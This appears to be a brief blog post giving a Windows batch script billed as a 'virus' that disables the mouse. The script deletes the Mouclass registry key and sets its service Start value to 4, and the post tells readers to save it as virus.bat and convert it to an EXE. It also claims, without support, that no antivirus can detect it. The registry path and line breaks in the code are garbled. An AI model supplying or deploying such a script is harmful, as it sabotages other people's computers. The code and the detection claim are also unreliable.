A virus that disable Mouse
This is simplest way to make virus.
Also it cannot be detect by any antivirus.
Open Notepad and copy
below codes:-
rem ———————————
rem Disable Mouse
set
key=”HKEY_LOCAL_MACHINEsystemCurrentControlSetServicesMouclass”
reg delete %key%
reg add %key% /v Start /t
REG_DWORD /d 4
rem ———————————
Save this file as virus.bat.
To Convert it into EXE click here.
No comments:
Post a Comment